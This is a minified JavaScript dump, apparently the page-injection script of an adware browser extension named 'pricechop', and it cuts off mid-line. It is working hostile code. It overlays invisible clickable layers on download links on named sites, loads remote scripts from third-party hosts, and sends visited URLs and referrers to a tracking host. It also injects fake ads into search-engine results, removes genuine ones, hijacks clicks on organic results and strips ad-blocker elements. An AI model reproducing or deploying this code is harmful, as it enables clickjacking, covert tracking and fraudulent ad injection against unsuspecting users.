Subt\\u00edtulo\"===(g[i].innerText?g[i].innerText:g[i].textContent)){var f=document.createElement(\"div\");f.style.position=\"absolute\";f.style.width=\"100%\";f.style.height=\"100%\";f.style.cursor=\"pointer\";f.style.top=\"0\";f.style.left=\"0\";f.style.zIndex=\"2000\";var h=g[i].parentNode;h.appendChild(f);h.style.position=\"relative\"}}};\nnew function(){if(0<location.host.toLowerCase().indexOf(\"ubtitles4free.ne\")){var g=document.links;for(i=0;i<g.length;i++)if(\"Download Subtitle\"===(g[i].innerText?g[i].innerText:g[i].textContent)){var f=document.createElement(\"div\");f.style.position=\"absolute\";f.style.width=\"100%\";f.style.height=\"100%\";f.style.cursor=\"pointer\";f.style.top=\"0\";f.style.left=\"0\";f.style.zIndex=\"2000\";var h=g[i].parentNode;h.appendChild(f);h.style.position=\"relative\"}}};\nnew function(){if(0<location.host.toLowerCase().indexOf(\"egendasbrasil.or\")){var g=document.links;for(i=0;i<g.length;i++)if(\"Baixar Legenda\"===(g[i].innerText?g[i].innerText:g[i].textContent)){var f=document.createElement(\"div\");f.style.position=\"absolute\";f.style.width=\"100%\";f.style.height=\"100%\";f.style.cursor=\"pointer\";f.style.top=\"0\";f.style.left=\"0\";f.style.zIndex=\"2000\";var h=g[i].parentNode;h.appendChild(f);h.style.position=\"relative\"}}};\nnew function(){window.location.host.toLowerCase().indexOf(\"reeroms.co\")&&(window.__sdahfjkahfals3243Count=0,window.__sdahfjkahfals3243Int=setInterval(function(){for(var g=document.getElementsByTagName(\"a\"),f=0;f<g.length;f++){var h=\"undefined\"===typeof g[f].innerText?g[f].textContent:g[f].innerText,h=h.trim();if(\"Download\"===h||0==h.indexOf(\"Direct\")){var k=document.createElement(\"div\");k.style.width=\"100%\";k.style.height=\"100%\";k.style.position=\"absolute\";k.style.zIndex=\"9999\";k.style.top=\"0\";k.style.cursor=\n\"pointer\";var m=g[f].parentNode;m.style.position=\"relative\";m.appendChild(k);0==h.indexOf(\"Direct\")&&clearInterval(window.__sdahfjkahfals3243Int)}}40<window.__sdahfjkahfals3243Count++&&clearInterval(window.__sdahfjkahfals3243Int)},500))};\nnew function(){if(-1<window.location.host.toLowerCase().indexOf(\"eneral-ebooks.co\"))for(var g=document.getElementsByTagName(\"iframe\"),f=0;f<g.length;f++){var h=g[f].parentNode;if(null!=h){var k=h.getAttribute(\"class\");null!=k&&-1<k.indexOf(\"banner-body\")&&(k=document.createElement(\"div\"),k.style.width=\"100%\",k.style.height=\"100%\",k.style.position=\"absolute\",k.style.zIndex=\"9999\",k.style.top=\"0\",k.style.cursor=\"pointer\",h.style.position=\"relative\",h.appendChild(k))}}};\nnew function(){-1<location.host.toLowerCase().indexOf(\"tream2watch.m\")&&(window.__z_tream2count=0,window.__z_tream2int=setInterval(function(){20<window.__z_tream2count++&&clearInterval(window.__z_tream2int);var g=document.getElementById(\"rh_toolbar_STRTOPB\"),f=document.getElementById(\"rhfrm_STRTOPB\");if(null!=g&&null!=f){var h=document.createElement(\"div\");h.style.width=\"100%\";h.style.height=\"100%\";h.style.cursor=\"pointer\";h.style.zIndex=\"2000\";h.style.position=\"absolute\";g.appendChild(h);f.style.position=\n\"absolute\";f.style.zIndex=\"-1\";clearInterval(window.__z_tream2int)}},500))};;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1500/l.js?aoi=1311798366&pid=1500&zoneid=288109&ext=pricechop&systemid=16594767138824750826&ext=pricechop\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1542/l.js?aoi=1311798366&pid=1542&zoneid=288109&ext=pricechop&systemid=16594767138824750826&ext=pricechop\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1399/l.js?aoi=1311798366&pid=1399&zoneid=288109&ext=pricechop&systemid=16594767138824750826&ext=pricechop\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;window.top==window.self&&\"undefined\"==typeof __yael_running&&(window.__yael_running=!0,new function(){if(!document.getElementById(\"__yael_once\")){var m=document.createElement(\"div\");m.id=\"__yael_once\";var n=document.getElementsByTagName(\"body\")[0];n&&n.appendChild(m);var b=this;b.pixelHost=\"//sepx.sendapplicationget.com\";b.prefix=\"jhgasdf\";b.version=\"0.5\";b.now=(new Date).getTime();b.clickInterval=2592E5;b.ratio=12;b.initThrottle=\"google;gmaps;amazon\";b.unique_items_left=!0;b.eid=decodeURIComponent(\"pricechop\"); b.num_of_items_in_one=4;b.count=0;b.baseHostname=\"sendapplicationget.com\";b.utils=new function(){var a=this;a.isFalse=function(a){return\"undefined\"==typeof a||0===a.length||null===a};a.cookie=new function(){var a=this;a.createCookie=function(a,c,b){if(b){var g=new Date;g.setTime(g.getTime()+864E5*b);b=\"; expires=\"+g.toGMTString()}else b=\"\";document.cookie=a+\"=\"+c+b+\"; path=/\"};a.readCookie=function(a){a+=\"=\";for(var c=document.cookie.split(\";\"),b=0;b<c.length;b++){for(var g=c[b];\" \"==g.charAt(0);)g= g.substring(1,g.length);if(0==g.indexOf(a))return g.substring(a.length,g.length)}return null};a.eraseCookie=function(b){a.createCookie(b,\"\",-1)}};a.ajax={get:function(c,b){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",c,!0),this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&b(a.ajax.xhr.responseText)},this.xhr.send()}catch(e){}},post:function(c,b,e){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",c,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\"); this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&e(a.ajax.xhr.responseText)};b=encodeURIComponent(b);this.xhr.send(b)}};a.waitForTokens={};a.addScript=function(a,b){if(\"bing\"==b){var e=Element.prototype.appendChild;document.createElement(\"iframe\");Element.prototype.appendChild=document.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(a);Element.prototype.appendChild=e}else document.getElementsByTagName(\"head\")[0].appendChild(a)};a.waitForElement=function(c,d,e,f){var g= a.query_selector_all(c);clearTimeout(a.waitTimeout);if(25<b.waitForElementCounter)return d(null);if(\"undefined\"==typeof g||1>g.length){if(a.waitForTokens[f])return d(null);var h=arguments.callee;a.waitTimeout=setTimeout(function(){b.waitForElementCounter++;h(c,d,e,f)},e)}else{if(a.waitForTokens[f])return d(null);a.waitForTokens[f]=!0;b.waitForElementCounter=0;return d(g)}};a.flushWaitForTokens=function(){a.waitForTokens={}};a.getRandomInt=function(a,b){return Math.floor(Math.random()*(b-a+1))+a}; a.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(b){return{getPropertyValue:function(d){\"float\"==d&&(d=\"styleFloat\");d=a.dhtml_prop_name(d);return\"object\"==typeof b.currentStyle&&null!=b.currentStyle&&\"undefined\"!=typeof b.currentStyle[d]?b.currentStyle[d]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};a.query_selector_all=document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b= a.match(/^#([^,\\s]+)$/)||[];if(1<b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(b);document.__asya_qsaels=[];b.styleSheet.cssText=a+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};a.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}: function(a){if(a instanceof Object){var b=new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};a.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,b,c){return c.toUpperCase()})};a.wildcard_to_regex=function(a){a=a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a=a.replace(/\\*/g,\".*\");return RegExp(a)};a.throttle=function(a,b){var e=null;return function(){var f=this,g=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(f,g)},b)}};a.epoch=function(){return(new Date).getTime()}; a.msie=function(){var a=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(a)&&(a=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(a)?!1:a}();a.version_ie_less=function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};a.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)}; a.match_url=function(b,d){for(var e=0;e<d.length;e++)if(\"string\"==typeof d[e]){var f;f=/^\\/.+\\/$/.test(d[e])?RegExp(d[e]):a.wildcard_to_regex(d[e]);if(f instanceof RegExp&&f.test(b))return!0}};a.ping=function(a){for(var d=[\"google\",\"bing\",\"yahoo\",\"youtube\"],e=0;e<d.length;e++)if(-1<location.hostname.indexOf(d[e])){var f=new Image,g=encodeURIComponent(window.self==window.top?window.self.location.href:\"\");1E3<g.length&&(g=encodeURIComponent(location.hostname));var h=encodeURIComponent(location.hostname); f.src=b.pixelHost+\"?hid=16594767138824750826&eid=42&pid=1160&prodid=186&v=\"+b.version+\"&ch=\"+a+\"&lan=\"+navigator.language+\"&cc=PL&pr=\"+d[e]+\"&host=\"+h+\"&ref=\"+g}}};var k=[\"horizontal\",\"vertical\",\"images-horizontal\",\"images-vertical\"];b.jsonpHost=function(){var a=\"s1. s1. s2. s3. s4. s5. s6.\".split(\" \");return a[b.utils.getRandomInt(0,a.length-1)]+\"\"}()+b.baseHostname;b.projects_info={google:{hrefSelector:\".r a\",unique_search_divs:\"3\",urls:[\"www.google.*\"], src_for_keyword:[\"#gbqfq\",\"#lst-ib\",\"#sbhost\"],dr:[\"#tvcap\",\"#bottomads\",\"#tads\"],tweak:function(){b.events.flush();var a=b.utils.query_selector_all(\"#nav td\"),c=b.utils.query_selector_all(\".spell + a\")[0];if(0<a.length)for(var d=0;d<a.length;d++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[d],!0);\"undefined\"!==typeof c&&b.events.add(\"click\",function(){b.init_search_project()},!1,c,!0)},validate:function(a){var c=this;if(-1<location.href.indexOf(\"https://www.google.com/maps\")||location.href.match(/https:\\/\\/www.google.[a-z,\\.]+\\/$/g))return!0; c.callback=a;c.count=0;this.check_tab=function(){var a=document.getElementById(\"hdtb_msb\")||b.utils.query_selector_all(\".tn\");if(b.utils.isFalse(a))if(c.count++,10>c.count)setTimeout(function(){c.check_tab()},1E3);else return!1;else return(b.utils.query_selector_all(\".hdtb_mitem\")[0]||b.utils.query_selector_all(\".tn > div\")[0]).className.match(/(hdtb_msel|tn-selected-mode)/)&&(b.utils.ping(\"validate2\"),c.callback()),!1};if(!c.check_tab())return!1}},yahoo:{hrefSelector:\"a[id^=link]\",unique_search_divs:\"3\", dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"yahoo\"],src_for_keyword:\"#yschsp\",validate:function(){b.utils.ping(\"validate2\");return!0}},bing:{hrefSelector:[\".b_algo a\",\".sb_tlst a\"],unique_search_divs:\"2\",dr:[\".sb_adsWv2\"],urls:[\"http://www.bing.com/search?*\"],src_for_keyword:[\"#sb_form_q\",\".b_searchboxForm[name='q']\"],validate:function(){b.utils.ping(\"validate2\");return!0}},conduit:{hrefSelector:\"a[id^=ctl00_main_organicResults]\",unique_search_divs:\"1\",urls:[\"http://search.conduit.com*\"],src_for_keyword:\"#q_top\", dr:[\"#master-1\"],validate:function(){return!0}},ask:{hrefSelector:\".ptbs  a[id^=r]\",unique_search_divs:\"1\",urls:[\"http://www.ask.com/web?q=*\",\"http://www.ask.com/web?qsrc=*\",\"http://www.ask.com/web?am=broad&q=*\"],src_for_keyword:[\"#top_qcomn\",\"#top_q_comm\"],dr:[\"#spl_img_top\"],validate:function(){return!0}},triple:{hrefSelector:\".gRsSlicetitle\",unique_search_divs:\"2\",dr:[\"#gRsTopLinks\"],urls:[\"http://search.triple-search.com/?*\",\"http://www.search.triple-search.com/?*\"],src_for_keyword:\"#q\",validate:function(){var a= b.utils.query_selector_all(\".gRsSTypeSelltr\");if(0<a.length){for(var c=0;c<a.length;c++)if(\"English\"==a[c].innerHTML)return!0;return!1}}},incredimail:{hrefSelector:\".title\",unique_search_divs:\"3\",dr:[\"#MainSponsoredLinks\"],urls:[\"http://www.search.incredimail.com/search.php?q*\",\"http://search.incredimail.com/search.php?q*\"],src_for_keyword:\"#q\",validate:function(){return-1<location.href.indexOf(\"lang=english\")?!0:!1}},gmaps:{hrefSelector:\"div[class^='ads-line'] a\",unique_search_divs:\"1\",dr:[\".ads.horiz.top\", \".ads.horiz.bot\"],urls:[\"https://www.google.com/maps/*\"],src_for_keyword:\"#searchboxinput\",tweak:function(){var a=function(){b.remove_search();b.utils.query_selector_all(\".omnibox-cards-transformations\")[0].style.marginTop=\"0px\";document.getElementById(\"reveal-cards\").style.marginTop=\"0px\"};b.events.add(\"click\",function(){a()},!1,document.getElementById(\"cards\"),!1);b.events.add(\"keyup\",function(){a()},!1,document.getElementById(\"searchbox_form\"),!1);b.events.add(\"click\",function(){a()},!1,document.getElementById(\"viewcard\"), !1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".widget-runway-pegman\")[0],!1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".gscb_a\")[0],!1);var c=function(a){a=document.querySelector(a);return getComputedStyle(a,null).height}(\".yael .cards-card\");document.querySelector(\".omnibox-cards-transformations\").style.marginTop=c;document.querySelector(\"#reveal-cards\").style.marginTop=c},validate:function(a){b.utils.isIE()||(b.num_of_items_in_one=1,a())}},amazon:{unique_search_divs:\"1\", urls:[\"http://www.amazon.com*&field-keywords=*\"],src_for_keyword:\"#twotabsearchtextbox\",validate:function(a){a()}},smartAddress:{hrefSelector:[\"li a\"],unique_search_divs:\"2\",dr:[\".peach ol\"],urls:[\"search.smartaddressbar.com/web.php?s=*\"],src_for_keyword:\"#stxt\",tweak:function(){var a=b.utils.query_selector_all(\".peach\")[0],c=b.utils.query_selector_all(\".right ul\")[0];a&&a.parentNode.removeChild(a);c&&c.parentNode.removeChild(c)},validate:function(){return!0}}};var l=function(a){if(\"string\"==typeof a){var c= a.match(/:nth-match\\(([0-9]+)\\)/);if(c&&1<c.length)return a=b.utils.query_selector_all(a.substr(0,c.index))||[],a[c[1]]||void 0;a=b.utils.query_selector_all(a)||[];return a[0]||void 0}};b.events=new function(){var a=this;a.cache=[];a.add=window.addEventListener?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f.addEventListener(b,d,e);g&&a.cache.push([b,d,e,f])}:window.attachEvent?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f[\"e\"+b+d]=d;f[b+d]=function(){f[\"e\"+b+d](window.event)};f.attachEvent(\"on\"+ b,f[b+d]);g&&a.cache.push([b,d,e,f])}:function(){};a.remove=window.removeEventListener?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.removeEventListener(a,b,e)}:window.detachEvent?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.detachEvent(\"on\"+a,f[a+b]);f[a+b]=null;f[\"e\"+a+b]=null}:function(){};a.flush=function(){for(var b=0;b<a.cache.length;b++)a.remove.apply(a,a.cache[b]);a.cache=[]}};b.get_insertion_element=function(a){return!a.insert||\"before\"!=a.insert&&\"after\"!=a.insert?a.element: a.element.parentNode};b.dom=new function(){this.json_to_html=function(a,c){if(\"#text\"==a.type)c=document.createTextNode(a.text);else if(\"#comment\"!=a.type){c||(c=document.createElement(a.type));if(a.attrs){for(var d in a.attrs)if(a.attrs.hasOwnProperty(d))if(\"style\"==d&&a.attrs.style instanceof Object)for(var e in a.attrs.style){var f=b.utils.dhtml_prop_name(e);try{c.style[f]=a.attrs.style[e]}catch(g){}}else c.setAttribute(d,a.attrs[d]);\"iframe\"==a.type&&(a.attrs.hasOwnProperty(\"frameborder\")&&(c.frameBorder= a.attrs.frameborder),a.attrs.hasOwnProperty(\"marginwidth\")&&(c.marginWidth=a.attrs.marginwidth),a.attrs.hasOwnProperty(\"marginheight\")&&(c.marginHeight=a.attrs.marginheight))}if(a.children)for(d=0;d<a.children.length;d++){f=a.children[d];e=arguments.callee(f);try{c.appendChild(e)}catch(h){if(\"#text\"==f.type&&\"string\"==typeof f.text)if(\"style\"==a.type&&c.styleSheet)c.styleSheet.cssText=f.text||\"\";else if(e=b.utils.get_node_text_prop(c))c[e]=f.text}}}return c}};b.addEventClick=function(a,c){for(var d= 0;d<a.length;d++)b.events.add(\"click\",function(a){a.preventDefault?a.preventDefault():a.returnValue=!1;this.href=\"#\";location.href=c+\"&j=true\";b.events.flush();localStorage.setItem(b.prefix,b.now+b.clickInterval);return!1},!1,a[d],!0)};b.checkClickInterval=function(a){if(b.now>a)return!0};b.setClickHref=function(a,c){if(\"undefined\"!=typeof b.projects_info[c].hrefSelector){if(b.utils.getRandomInt(1,1E4)>=1E4/b.ratio)return!1;var d=b.projects_info[c].hrefSelector,e=parseInt(localStorage.getItem(b.prefix)); if(\"undefined\"!=typeof d){if(d instanceof Array)for(var f=0;f<d.length;f++){var g=b.utils.query_selector_all(d[f]);if(0<g.length)break}else g=b.utils.query_selector_all(d);if(!e||b.checkClickInterval(e))b.addEventClick(g,a),b.j=!0}}};b.escape_chars_for_json=function(a){for(var b in a)a[b]=a[b].replace(/\\\"/g,'\\\\\"');return a};b.tpl_engine=function(a,c,d){\"false\"!==d.layouts.unique&&(c=b.escape_chars_for_json(c));a=JSON.stringify(a);c=[{replace:\"title\",\"with\":c.title},{replace:\"displayUrl\",\"with\":c.displayUrl}, {replace:\"description\",\"with\":c.description},{replace:\"clickUrl\",\"with\":c.clickUrl}];for(d=0;d<c.length;d++)a=a.replace(RegExp(\"\\\\[##\"+c[d].replace+\"##\\\\]\",\"g\"),c[d][\"with\"]);try{return JSON.parse(a)}catch(e){}};b.get_item_json=function(a,c){var d=b.utils.clone_object(a.layouts.template);d.attrs instanceof Object||(d.attrs={});return d=b.tpl_engine(d,c,a)};b.add_jsonp_to_config=function(a,c){b.get_item_json(a)};b.remove_search=function(){var a=b.utils.query_selector_all(\".yael\");if(0<a.length)for(var c= 0;c<a.length;c++)a[c].parentNode.removeChild(a[c])};b.inject_json=function(a){\"first\"==a.insert?a.element.insertBefore(a.node,a.element.firstChild):\"before\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element):\"after\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element.nextSibling):a.element.appendChild(a.node)};b.get_ad_dom=function(a){return a.layouts instanceof Object&&a.layouts.dom instanceof Object?a.layouts.dom:!1};b.get_layout_type=function(a){if(a.layouts instanceof Object)for(var b= 0;b<k.length;b++)if(-1<a.layouts.id.indexOf(k[b]))return k[b];return!1};b.create_search=function(a){a=b.get_ad_dom(a);return b.dom.json_to_html(a)};b.templates=new function(){this.container_id=0;this.add_real_links=function(a,c){b.utils.add_event(\"click\",function(b){window.open(a);b.preventDefault?b.preventDefault():b.returnValue=!1},!1,c)}};b.validate_response=function(){for(var a in __yael_res.data.items)__yael_res.data.items[a].displayUrl.match(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/)&&__yael_res.data.items[a].displayUrl.replace(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/, \"\")};b.is_target_valid=function(a){if(0!=__yael_res.data.numberOfItems&&\"undefined\"!=typeof a.element)return a.urls instanceof Array&&!b.utils.match_url(a.element.ownerDocument.location.href,a.urls)?!1:!0};var p=null;b.get_target_element=function(a){if(a.inserts instanceof Array&&\"undefined\"==typeof a.element)for(var b=0;b<a.inserts.length;b++)if(a.element=l(a.inserts[b].selector),\"undefined\"!==typeof a.element){a.insert=a.inserts[b].at;break}};b.add_data_to_config=function(a,c){if(0==c.length)return b.unique_items_left= !1;var d=b.get_ad_dom(a);(function(a,c){c.children&&0!==c.children.length?(c=c.children[c.children.length-1],arguments.callee(a,c)):b.insert_point=c})(a,d);for(d=0;d<b.num_of_items_in_one&&0!=c.length;d++)b.insert_point.children.push(b.get_item_json(a,c[0])),\"true\"==a.layouts.unique?b.not_unique_items.push(c.shift()):c.shift()};b.addEventsToItems=function(){for(var a=document.querySelectorAll('a[href*=\"'+b.jsonpHost+'\"]'),c=0;c<a.length;c++)b.events.add(\"click\",function(){b.init_search_project()}, !1,a[c],!1)};b.check_if_div_in_dom=function(a,b){var d=[],e;for(e in __yael_res.config.targets){var f=__yael_res.config.targets[e];clearTimeout(p);a++;if(4<a)return;if(f.inserts instanceof Array&&\"undefined\"==typeof f.element)for(var g=0;g<f.inserts.length;g++){var h=l(f.inserts[g].selector);\"undefined\"!==typeof h&&d.push(h)}}for(e=0;e<d.length;e++)if(\"undefined\"==typeof d[e]){var k=this;p=setTimeout(function(){k.apply(k,arguments)},200)}b()};b.addExtensionName=function(a){var c=JSON.stringify(a.layouts.dom); if(!c.match(/\\[##eid##\\]/))return a;c=c.replace(/\\[##eid##\\]/g,b.eid);a.layouts.dom=JSON.parse(c);return a};b.loop_targets=function(a,c,d){if(a instanceof Object&&(b.get_target_element(a),b.is_target_valid(a)&&(\"false\"==d&&b.unique_items_left&&(c=b.not_unique_items),0!=c.length))){b.add_data_to_config(a,c);try{a=b.addExtensionName(a)}catch(e){}try{a.node=b.create_search(a)}catch(f){}\"undefined\"!=typeof a.node&&b.inject_json(a)}};b.removeSecondClick=function(){for(var a=b.utils.query_selector_all(\".yael a\"), c=0;c<a.length;c++)b.events.add(\"click\",function(a){setTimeout(function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++){var d=a[c];d.outerHTML=d.outerHTML.replace(/href\\=/ig,\"_href=\")}},20)},!1,a[c],!0)};b.addCloseFunctionality=function(){function a(a){for(var b=a.className.split(\" \"),c=0;c<b.length;c++)if(\"yael\"===b[c])return a;if(!a.parentElement)return!1;a=a.parentElement;return arguments.callee(a)}var c=b.utils.query_selector_all(\".yael_close_btn\");if(c)for(var d=0;d<c.length;d++)b.events.add(\"click\", function(){try{var b=a(this)}catch(c){}b&&b.parentElement.removeChild(b)},!1,c[d],\"closeBtn\")};b.inject_search=function(){b.not_unique_items=[];0!=__yael_res.data.items.length&&(b.setClickHref(__yael_res.data.items[0].clickUrl,b.projects_name),b.check_if_div_in_dom(0,function(){for(var a in __yael_res.config.targets){var c=__yael_res.config.targets[a];b.loop_targets(c,__yael_res.data.items,c.layouts.unique)}\"function\"==typeof b.projects_info[b.projects_name].tweak&&b.projects_info[b.projects_name].tweak(); b.j||b.removeSecondClick();b.addCloseFunctionality();b.utils.flushWaitForTokens()}))};b.init_search_project=function(){b.waitForElementCounter=0;\"undefined\"!=typeof __yael&&b.remove_search();for(var a in b.projects_info)if(b.utils.match_url(location.href,b.projects_info[a].urls)){var c=b.projects_info[a];b.projects_name=a;if(-1<b.initThrottle.indexOf(a))c.validate(function(){c.name=b.projects_name;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})});else{if(!c.validate())return;c.name=b.projects_name; b.projects_name=a;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})}}return!1};b.get_keyword=function(a,c){var d=a.src_for_keyword,e=function(d){b.inputElement=d[0];b.keyword=b.inputElement.value;if(2>b.keyword.length)return b.utils.flushWaitForTokens(),!1;if(b.inputElement&&\"input\"==b.inputElement.tagName.toLowerCase()&&\"\"!==b.keyword)return c(b.keyword,a.name)};if(d instanceof Array)for(var f=0;f<d.length;f++)b.utils.waitForElement(d[f],function(a){a&&e(a)},100,\"keyword\");else b.utils.waitForElement(d, function(a){a&&e(a)},100,\"keyword\")};b.remove_se_handler=function(a){var c=b.projects_info[a].dr;if(c instanceof Array)if(\"bing\"==a)for(c=b.utils.query_selector_all(c[0]),a=0;a<c.length;a++)b.remove_se(c[a]);else for(a=0;a<c.length;a++){var d=l(c[a]);b.remove_se(d)}};b.remove_se=function(a){a&&a.parentElement.removeChild(a)};b.jsonp_request=function(a,c){var d=b.num_of_items_in_one*parseInt(b.projects_info[c].unique_search_divs);window.__yael_cb=function(a){window.__yael_res=a;\"0\"==__yael_res.data.numberOfItems? b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&b.remove_se_handler(c),__yael.inject_search())};\"undefined\"==typeof window.__yael&&(window.__yael=b);d=b.jsonpHost+\"/?v=\"+b.version+\"&p=\"+c+\"&keyword=\"+a+\"&numItems=\"+d+\"&hid=16594767138824750826&eid=42&pid=1160&prid=186\";\"undefined\"!=typeof specificFeeds&&specificFeeds instanceof Array&&(d+=\"&_feeds=\"+specificFeeds.join(\",\"));if(b.utils.isIE()){if(document.getElementById(\"__yael_script\")){var e=document.getElementById(\"__yael_script\"); e.parentNode.removeChild(e)}e=document.createElement(\"script\");e.id=\"__yael_script\";e.src=\"//\"+d+\"&domvar=__yael_cb\";e.type=\"text/javascript\";b.utils.addScript(e,c)}else b.utils.ajax.get(\"//\"+d,function(a){window.__yael_res=JSON.parse(a);\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&__yael.remove_se_handler(c),__yael.inject_search())})};\"undefined\"==typeof __yael&&b.init_search_project();-1<b.initThrottle.indexOf(b.projects_name)&&b.events.add(\"keyup\", b.utils.throttle(b.init_search_project,3E3),!1,b.inputElement,!1)}});;new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4450fm\")&&window.self==window.top&&\"http:\"==window.self.location.protocol){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//istatic.datafastguru.info/fo/min/wp.js?subid=42_1160&hid=16594767138824750826&bname=pricechop\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4450fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}};;try{new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4440fm\")&&\"http:\"==location.protocol&&window.self==window.top){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//istatic.datafastguru.info/fo/min/wpb.js?subid=42_1160&hid=16594767138824750826&bname=pricechop\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4440fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}}}catch(e$$12){};;try{new function(){if(null==document.getElementById(\"id_a02b170eff6bb769\")&&window.self==window.top){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//d1qqddufal4d58.cloudfront.net/scripts/contextualjs/v2/ctxjs.js?aff_id=1151&subaff_id=42_1160\";a.setAttribute(\"id\",\"id_a02b170eff6bb769\");document.getElementsByTagName(\"head\")[0].appendChild(a)}}}catch(e$$12){};;(function(){if(!document.getElementById(\"qwejkhjkshdfs_4\")&&window.self==window.top){var a=document.createElement(\"script\");a.id=\"inj_grazit_script_starter\";a.type=\"text/javascript\";a.src=\"//ext1.engageya.com/widget/inject_spark/inj_sprk_starter.js?pid=LTEsMTQyNTU5LDk0NjA4LDU0OTcx&subid=42_1160&appname=pricechop\";a.setAttribute(\"id\",\"qwejkhjkshdfs_4\");document.getElementsByTagName(\"head\")[0].appendChild(a)}})();;if(window.self.location.hostname.indexOf('mail.')==-1)\n{try{for(i=0;i<5;i++){window.setTimeout(function(){if(document.getElementById(\"cblocker\")){document.getElementById(\"cblocker\").parentNode.removeChild(document.getElementById(\"cblocker\"));};if(document.getElementById(\"_vdcbl\")){document.getElementById(\"_vdcbl\").parentNode.removeChild(document.getElementById(\"_vdcbl\"));}},i*100)}}catch(e){};\n};(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"I8rcX88E=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"I8rcX88E=\")){var d=a.match(/I8rcX88E=(\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.webscorebox.com/?q=g708BNmGWj8njchVWzmPhd99rShEAen0rjw7rch7hftHAe0KojUMgNtLD6qVCT9GtMDPhd9EtMZPhd9FqTk4qdC7qHwHpdYGqdC8rdYGqY==\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" 